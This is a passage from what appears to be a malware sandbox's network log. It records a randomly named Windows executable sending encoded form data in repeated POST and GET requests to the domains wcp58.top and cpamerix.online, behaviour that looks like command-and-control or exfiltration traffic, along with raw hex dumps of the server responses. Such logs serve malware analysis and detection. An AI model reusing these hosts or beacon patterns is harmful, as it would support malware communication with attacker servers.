                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Oct 23, 2024 07:03:35.010569096 CEST | 1236 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                                        Oct 23, 2024 07:03:35.010587931 CEST698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
9           192.168.2.7  59656        154.23.184.240  80                484  C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 07:03:40.743078947 CEST  736                OUT        POST /u071/ HTTP/1.1
Host: www.wcp58.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.wcp58.top
Content-Length: 219
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.wcp58.top/u071/
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Data Ascii: fvM8Gh=WDh8/OBQqy+KSB7vIw4WpbMBcFCpbPSmIs2TkBoVcQrhsJbaF3YG4uINa54Hn9A3XNYYXlZqQWsj8XicWF/8Ap7VgLR+StYJPthdMNf1GcnWMCSSy60y54bTMlu189o0qeUwp8TkP89gZ2fZ1/38n5h4dWn3hlywJg5hd680DNy+adjbo05UIcGAHc8SGxB1fyuqHsZakWzlmbayAw==
Oct 23, 2024 07:03:41.684956074 CEST  312                IN         HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 23 Oct 2024 05:03:41 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66a72cd5-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
10          192.168.2.7  59657        154.23.184.240  80                484  C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 07:03:43.288655996 CEST  756                OUT        POST /u071/ HTTP/1.1
Host: www.wcp58.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.wcp58.top
Content-Length: 239
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.wcp58.top/u071/
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Data Ascii: fvM8Gh=WDh8/OBQqy+KdBrvNXsWo7MCTlCpCfSiIs6TkAsFJ2ThstfaEzMG7uINCJ4G6NACXNEQXnNqQVQj8V6cRyr/B57X1bRwMdYJPthdMNLbGc/WM3aS970164bUaVu12dowqeUCp9PeP+1gZ0HZ1tfzt5h+ZWmvowrbHBBeQbgMDsCAWL+5yW14WN+7DeYkRXcAdzqyKOt77hWPrJ72WPFCnU4p8JXkuzy2SstcqIk=
Oct 23, 2024 07:03:44.790514946 CEST  312                IN         HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 23 Oct 2024 05:03:44 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66a72cd5-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
11          192.168.2.7  59658        154.23.184.240  80                484  C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 07:03:45.835012913 CEST  1769               OUT        POST /u071/ HTTP/1.1
Host: www.wcp58.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.wcp58.top
Content-Length: 1251
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.wcp58.top/u071/
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Data Ascii: fvM8Gh= [TRUNCATED]
Oct 23, 2024 07:03:47.346669912 CEST  312                IN         HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 23 Oct 2024 05:03:46 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66a72cd5-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
12          192.168.2.7  59659        154.23.184.240  80                484  C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 07:03:48.380656958 CEST  482                OUT        GET /u071/?fvM8Gh=bBJc85dRrz6VYFP8GwFXoZFtfmuQO+iyQ8ywsDhPMj3PkpaAJncRlOwVGrcs7/oiPMEubiNmeHgqiRXMS1H3OK+Zq7VhNcw4P6d6BN/xAJTWHzjowpdO9JjlTFWXwfVVhN461s++G65d&DfDx=AFrxfzcH-Ld HTTP/1.1
Host: www.wcp58.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Oct 23, 2024 07:03:50.333424091 CEST  312                IN         HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 23 Oct 2024 05:03:50 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66a72cd5-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
13          192.168.2.7  59660        194.58.112.174  80                484  C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 07:03:55.909245014 CEST  754                OUT        POST /muj9/ HTTP/1.1
Host: www.cpamerix.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.cpamerix.online
Content-Length: 219
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.cpamerix.online/muj9/
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Data Ascii: fvM8Gh=si/I4u7LG2ZrtdJayksFILOgqdZ2gFyw3gie7wWxdgU3cV4455s0Bo6H7PGO0nZrc7wHW0tR0gZEjhx8dzbOomxSbm1hNROi6sqPtKxkiThtrlVRsO4se7tPpX7ukR74P8sqbPolBORvkPbp0O4lgxDoi6hvf124lSnvZqmdQOBc5IFkxscU33kqIqPVaMPNXqaeJ3cwLk/1rAxXQg==
Oct 23, 2024 07:03:56.709750891 CEST  1236               IN         HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 23 Oct 2024 05:03:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
Data Raw: (gzip-compressed chunked body, omitted)
Oct 23, 2024 07:03:56.709811926 CEST  1236               IN         Data Raw: (gzip-compressed body continuation, omitted)
Oct 23, 2024 07:03:56.709844112 CEST  424                IN         Data Raw: (gzip-compressed body continuation, omitted)
Oct 23, 2024 07:03:56.709974051 CEST  644                IN         Data Raw: (gzip-compressed body continuation, omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 59661 | 194.58.112.174 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:03:58.459850073 CEST | 774 | OUT | POST /muj9/ HTTP/1.1
    Host: www.cpamerix.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Origin: http://www.cpamerix.online
    Content-Length: 239
    Cache-Control: max-age=0
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.cpamerix.online/muj9/
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
    Data Raw: 66 76 4d 38 47 68 3d 73 69 2f 49 34 75 37 4c 47 32 5a 72 33 34 42 61 2b 6e 45 46 4a 72 4f 6a 6c 39 5a 32 71 6c 79 38 33 67 75 65 37 31 33 32 64 54 77 33 63 77 55 34 2b 4d 51 30 41 6f 36 48 7a 76 47 4c 35 48 5a 77 63 37 4d 6c 57 77 6c 52 30 67 64 45 6a 6c 31 38 64 43 62 4a 71 32 78 63 57 47 31 76 51 42 4f 69 36 73 71 50 74 4f 63 44 69 54 35 74 6f 55 46 52 73 72 4d 72 58 62 74 49 2b 6e 37 75 67 52 37 38 50 38 74 2f 62 4b 78 79 42 4e 6c 76 6b 50 4c 70 31 62 4d 6d 70 78 44 71 76 61 67 38 52 41 76 52 68 44 54 4f 58 59 65 4a 62 4f 63 2b 31 65 59 47 72 4f 51 34 70 6d 63 52 4d 6f 72 6a 4e 71 53 34 56 72 65 47 45 56 6f 52 55 54 61 66 6d 53 51 54 47 55 68 38 56 71 64 34 65 49 53 49 7a 2f 59 5a 63 45 50 2b 69 50 38 3d
    Data Ascii: fvM8Gh=si/I4u7LG2Zr34Ba+nEFJrOjl9Z2qly83gue7132dTw3cwU4+MQ0Ao6HzvGL5HZwc7MlWwlR0gdEjl18dCbJq2xcWG1vQBOi6sqPtOcDiT5toUFRsrMrXbtI+n7ugR78P8t/bKxyBNlvkPLp1bMmpxDqvag8RAvRhDTOXYeJbOc+1eYGrOQ4pmcRMorjNqS4VreGEVoRUTafmSQTGUh8Vqd4eISIz/YZcEP+iP8=
Oct 23, 2024 07:03:59.356173992 CEST | 1236 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 23 Oct 2024 05:03:59 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Content-Encoding: gzip
    Data Raw: 64 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 18 b6 45 52 79 38 fd e4 24 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ea ee 50 12 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d 27 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a db a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca fb 57 7e 61 9c c7 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 db 73 db 11 3b 61 10 c9 52 d7 1d a7 27 87 ad 9e d8 76 6c 61 a8 2f 0d c7 77 a4 c3 5d 23 b6 b9 2b 5a ab 10 21 1d e9 8a f6 ce ce 8e 69 87 98 32 72 76 cd c0 77 1d 5f 34 2d fd a8 89 2f 23 16 09 b7 55 89 e5 c4 15 f1 50 08 cc e2 89 9e c3 5b 15 ee ba 15 36 8c 44 bf d0 55 e9 66 f0 b1 0c 4c 3b 8e 31 c3 74 bc 83 55 e4 bd fb 1c 6a 05 be 89 3f eb ab 15 46 e6 83 b5 3c 3e 10 d6 ae a1 3a b6 9b b1 1d 39 a1 6c 5b 67 9a a7 37 df ba f4 [TRUNCATED]
    Data Ascii: d1aZko_1fQRERy8$(.PmHI#F}CvQ].)R~)*@9;s{gf{-'`C&eUqP:\Zh\A{'$gGW~a3sO*!F?0;)hlD9s;aR'vla/w]#+Z!i2rvw_4-/#UP[6DUfL;1tUj?F<>:9l[g776Xv2hCukSieB2aCVeZE,q^AEAlcnUcWN~n1Y$~f{vk7Mr`wb_l:AuC<,NDh{HRI]L|%KK~r~C%}z|oZkjs3:n PED3.~eJGMh73NNB3wT,v`[A,!F,tl8`n[5<b(j,j.wUCrcrcxlKAQNMH5=*_d&-+K"BK3<g>kg8n=jTX+0\J$p)'/x)=k},\EcJ0c/W|l,;L~Q'3;`&Gg-<It)F*)RjC' "1yhW)"*B<(N'UaZ3xoCdM@ [TRUNCATED]
Oct 23, 2024 07:03:59.356195927 CEST | 1236 | IN | Data Raw: 9b 75 ea fe 12 bb ba 86 87 68 76 fc 8e 2b fa d2 d0 91 8d 09 65 14 f8 83 a7 3b 05 54 0c b8 db 94 c9 fe 09 f4 22 6d c1 bc 4f 92 fb c0 99 92 30 c3 b2 f3 b1 ab 8d 13 8f bb da e5 85 26 dd 00 7c e7 21 51 fa 02 72 ff 8c f4 f7 20 fd 3d 42 e4 49 fa 65 f2
    Data Ascii: uhv+e;T"mO0&|!Qr =BIe=+n@Umq$t7]]N<d%f8> `.(K(C/0KSF2(o?J,xDB/&\lGz<4]\Jds9iN?";
Oct 23, 2024 07:03:59.356205940 CEST | 424 | IN | Data Raw: bb d7 d2 25 c8 33 5e 23 2c 1c 58 3a ae 5f f4 fc a4 23 fb ec da 23 bf 14 81 e2 3d 2e 79 8d fe d4 af 9f 62 a5 1f a7 cf 6a 8c da 4d 75 d3 81 53 4e 9c 4b d6 d9 6c 27 ea 1f 09 6c f0 fd b5 99 c1 7b a7 66 be 4e 65 e1 94 b4 e3 f4 16 ca d9 e6 11 a3 b3 c5
    Data Ascii: %3^#,X:_##=.ybjMuSNKl'l{fNe69{86;dC` zuk>;i"K2eZ h9{v4Z)&-L:E}_W37Jeqin,Iq"#yW7#GL,%
Oct 23, 2024 07:03:59.356343031 CEST | 644 | IN | Data Raw: d9 98 81 81 24 8b 53 86 7c 4b df 51 57 99 e3 4f 55 51 77 86 eb 73 1d 2e b2 aa e3 e3 ca ec 0a 46 c1 66 85 38 52 4d 7b 83 1c 5d 06 82 2a b9 8a 35 d7 68 d1 37 36 5f 31 2e 6c d5 cd b3 1f 98 ea 7b 7d f3 c3 0f e2 ad b3 b0 85 42 46 21 54 73 92 ba 9d 50
    Data Ascii: $S|KQWOUQws.Ff8RM{]*5h76_1.l{}BF!TsPRav}\>[K+A,)MV0R@cFI^>o)$JA+IVziSd"=FaTRM&Y)dL=*-K`2a193,$CNCEV/E@id6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 59662 | 194.58.112.174 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:04:01.014044046 CEST | 1787 | OUT | POST /muj9/ HTTP/1.1
    Host: www.cpamerix.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Origin: http://www.cpamerix.online
    Content-Length: 1251
    Cache-Control: max-age=0
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.cpamerix.online/muj9/
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
    Data Raw: 66 76 4d 38 47 68 3d 73 69 2f 49 34 75 37 4c 47 32 5a 72 33 34 42 61 2b 6e 45 46 4a 72 4f 6a 6c 39 5a 32 71 6c 79 38 33 67 75 65 37 31 33 32 64 54 34 33 66 43 63 34 35 62 45 30 44 6f 36 48 77 76 47 4b 35 48 59 79 63 2f 59 68 57 77 68 42 30 6d 42 45 6c 77 68 38 66 32 50 4a 67 32 78 63 4a 57 31 75 4e 52 4f 33 36 73 36 4c 74 4b 38 44 69 54 35 74 6f 57 74 52 6c 65 34 72 62 37 74 50 70 58 37 59 6b 52 36 68 50 38 31 76 62 4b 45 50 42 2b 39 76 68 62 58 70 79 74 51 6d 69 78 44 73 73 61 68 37 52 41 72 4b 68 44 50 38 58 63 57 6a 62 50 6f 2b 32 71 5a 79 36 4b 55 78 36 48 63 69 41 4a 2f 68 4b 49 57 48 63 6f 4f 62 44 48 68 7a 57 52 44 6a 74 68 73 6f 41 6a 51 44 48 72 35 59 58 37 69 54 30 35 78 78 47 46 43 2f 7a 5a 4c 70 4b 56 54 57 31 56 74 67 34 6c 43 50 63 2b 67 52 6d 55 44 4a 33 52 33 55 70 51 64 2f 6a 6a 79 56 34 63 75 39 45 59 73 6a 4d 4c 74 39 73 4a 59 59 68 4c 36 75 6f 33 46 2b 49 66 6f 79 6e 37 78 34 6b 36 54 38 6f 42 38 68 57 39 43 4d 30 67 59 57 38 79 58 52 6b 74 2b 6a 34 51 79 73 6a 50 6f 73 53 50 41 [TRUNCATED]
    Data Ascii: fvM8Gh= [TRUNCATED]
Oct 23, 2024 07:04:01.911946058 CEST | 1236 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 23 Oct 2024 05:04:01 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Content-Encoding: gzip
    Data Raw: 64 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 18 b6 45 52 79 38 fd e4 24 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ea ee 50 12 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d 27 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a db a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca fb 57 7e 61 9c c7 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 db 73 db 11 3b 61 10 c9 52 d7 1d a7 27 87 ad 9e d8 76 6c 61 a8 2f 0d c7 77 a4 c3 5d 23 b6 b9 2b 5a ab 10 21 1d e9 8a f6 ce ce 8e 69 87 98 32 72 76 cd c0 77 1d 5f 34 2d fd a8 89 2f 23 16 09 b7 55 89 e5 c4 15 f1 50 08 cc e2 89 9e c3 5b 15 ee ba 15 36 8c 44 bf d0 55 e9 66 f0 b1 0c 4c 3b 8e 31 c3 74 bc 83 55 e4 bd fb 1c 6a 05 be 89 3f eb ab 15 46 e6 83 b5 3c 3e 10 d6 ae a1 3a b6 9b b1 1d 39 a1 6c 5b 67 9a a7 37 df ba f4 [TRUNCATED]
    Data Ascii: d1aZko_1fQRERy8$(.PmHI#F}CvQ].)R~)*@9;s{gf{-'`C&eUqP:\Zh\A{'$gGW~a3sO*!F?0;)hlD9s;aR'vla/w]#+Z!i2rvw_4-/#UP[6DUfL;1tUj?F<>:9l[g776Xv2hCukSieB2aCVeZE,q^AEAlcnUcWN~n1Y$~f{vk7Mr`wb_l:AuC<,NDh{HRI]L|%KK~r~C%}z|oZkjs3:n PED3.~eJGMh73NNB3wT,v`[A,!F,tl8`n[5<b(j,j.wUCrcrcxlKAQNMH5=*_d&-+K"BK3<g>kg8n=jTX+0\J$p)'/x)=k},\EcJ0c/W|l,;L~Q'3;`&Gg-<It)F*)RjC' "1yhW)"*B<(N'UaZ3xoCdM@ [TRUNCATED]
Oct 23, 2024 07:04:01.912000895 CEST | 1236 | IN | Data Raw: 9b 75 ea fe 12 bb ba 86 87 68 76 fc 8e 2b fa d2 d0 91 8d 09 65 14 f8 83 a7 3b 05 54 0c b8 db 94 c9 fe 09 f4 22 6d c1 bc 4f 92 fb c0 99 92 30 c3 b2 f3 b1 ab 8d 13 8f bb da e5 85 26 dd 00 7c e7 21 51 fa 02 72 ff 8c f4 f7 20 fd 3d 42 e4 49 fa 65 f2
    Data Ascii: uhv+e;T"mO0&|!Qr =BIe=+n@Umq$t7]]N<d%f8> `.(K(C/0KSF2(o?J,xDB/&\lGz<4]\Jds9iN?";
Oct 23, 2024 07:04:01.912018061 CEST | 424 | IN | Data Raw: bb d7 d2 25 c8 33 5e 23 2c 1c 58 3a ae 5f f4 fc a4 23 fb ec da 23 bf 14 81 e2 3d 2e 79 8d fe d4 af 9f 62 a5 1f a7 cf 6a 8c da 4d 75 d3 81 53 4e 9c 4b d6 d9 6c 27 ea 1f 09 6c f0 fd b5 99 c1 7b a7 66 be 4e 65 e1 94 b4 e3 f4 16 ca d9 e6 11 a3 b3 c5
    Data Ascii: %3^#,X:_##=.ybjMuSNKl'l{fNe69{86;dC` zuk>;i"K2eZ h9{v4Z)&-L:E}_W37Jeqin,Iq"#yW7#GL,%
Oct 23, 2024 07:04:01.912144899 CEST | 644 | IN | Data Raw: d9 98 81 81 24 8b 53 86 7c 4b df 51 57 99 e3 4f 55 51 77 86 eb 73 1d 2e b2 aa e3 e3 ca ec 0a 46 c1 66 85 38 52 4d 7b 83 1c 5d 06 82 2a b9 8a 35 d7 68 d1 37 36 5f 31 2e 6c d5 cd b3 1f 98 ea 7b 7d f3 c3 0f e2 ad b3 b0 85 42 46 21 54 73 92 ba 9d 50
    Data Ascii: $S|KQWOUQws.Ff8RM{]*5h76_1.l{}BF!TsPRav}\>[K+A,)MV0R@cFI^>o)$JA+IVziSd"=FaTRM&Y)dL=*-K`2a193,$CNCEV/E@id6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 59663 | 194.58.112.174 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:04:03.548465967 CEST | 488 | OUT | GET /muj9/?fvM8Gh=hgXo7easQgYwzYM50VVsBbrTpvYmtRva0zGF6x/wVx5xdFtAh4cdAJarj8a6/VZ0fLckawx66xls7kEuRRfHglkiUnpuSxGF6OqSwfVcl2N6vBJ8grdIeIpeinnOhUKuNcVRLIFrNYJr&DfDx=AFrxfzcH-Ld HTTP/1.1
    Host: www.cpamerix.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Oct 23, 2024 07:04:04.447998047 CEST | 1236 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 23 Oct 2024 05:04:04 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Data Raw: 32 34 66 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 63 70 61 6d 65 72 69 78 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d [TRUNCATED]
    Data Ascii: 24f3<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.cpamerix.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.r [TRUNCATED]
Oct 23, 2024 07:04:04.448009014 CEST | 212 | IN | Data Raw: 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f
    Data Ascii: ><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.cpamerix.onlin
Oct 23, 2024 07:04:04.448021889 CEST | 1236 | IN | Data Raw: 65 3c 2f 68 31 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1
